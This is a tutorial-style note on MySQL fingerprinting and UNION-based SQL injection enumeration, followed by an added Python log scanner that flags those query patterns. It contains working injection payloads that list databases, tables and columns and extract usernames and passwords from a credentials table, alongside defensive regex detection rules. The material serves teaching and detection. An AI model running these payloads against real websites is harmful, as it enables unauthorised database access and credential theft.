πŸ—ƒοΈDatabase Enumeration

MySQL Fingerprinting

We can try to identify which database is being used with a few queries:

SELECT @@version - Returns the MySQL version if MySQL, errors out with other DBMS

SELECT POW(1,1) - Returns 1 if MySQL, errors with other DBMS

SELECT SLEEP(5) - Delays page response by 5 seconds if MySQL, will not delay with other DBMS

INFORMATION_SCHEMA

The INFORMATION_SCHEMA database contains information about the databases and the tables present.

SCHEMATA

We can find out which databases are available on the DBMS by querying the SCHEMATA table in INFORMATION_SCHEMA. Selecting the SCHEMA_NAME column lists all the database names present.

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

Working UNION SQL Injection Example

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

Let's say we found two databases other than the defaults: dev and customers.

We can then find out which database the web app is currently using:

cn' UNION select 1,database(),2,3-- -

TABLES

We can get a list of all the tables within the database with the below query.

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

COLUMNS

We can find the column names of a particular table with the below query:

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

Data

Once we have all the information, we can form our UNION query to retrieve the data, in this case the username and password columns from the credentials table in the dev database.

cn' UNION select 1, username, password, 4 from dev.credentials-- -
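
From the defender's side, every enumeration step above leaves the same keywords in the web server's access log. The following is an added example, not part of the original notes: it URL-decodes each query parameter, strips inline comments, and flags the patterns used on this page. The /search.php?q= endpoint, the rule names and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Rule names are this example's own; patterns mirror the queries on this page.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    "fingerprint": re.compile(
        r"@@version|\bsleep\s*\(\s*\d+\s*\)|\bpow\s*\(\s*1\s*,\s*1\s*\)"),
    "current_db": re.compile(r"\bdatabase\s*\(\s*\)"),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(value):
    """Lowercase, turn /**/ comments into spaces, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)

def scan_line(line):
    """Return (client, parameter, rule names) per suspicious URL-decoded parameter."""
    m = REQUEST.match(line)
    if not m:
        return []
    client, target = m.groups()
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits = sorted(r for r, rx in RULES.items() if rx.search(normalise(value)))
        if hits:
            findings.append((client, name, hits))
    return findings

def scan_log(lines):
    """Map each client address to the set of rules its requests triggered."""
    summary = {}
    for line in lines:
        for client, _param, hits in scan_line(line):
            summary.setdefault(client, set()).update(hits)
    return summary

# Constructed sample lines: documentation IPs, hypothetical /search.php?q= endpoint.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?q=cn HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=cn%27+UNION+select+1%2Cschema_name%2C3%2C4+from+INFORMATION_SCHEMA.SCHEMATA--+- HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?q=cn%27/**/UnIoN/**/SeLeCt/**/1%2Cdatabase()%2C2%2C3--+- HTTP/1.1" 200 600',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /search.php?q=student+union+tables HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

Keyword matching like this is a triage signal for log review, not a fix: parameterized queries in the application remove the injection itself.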
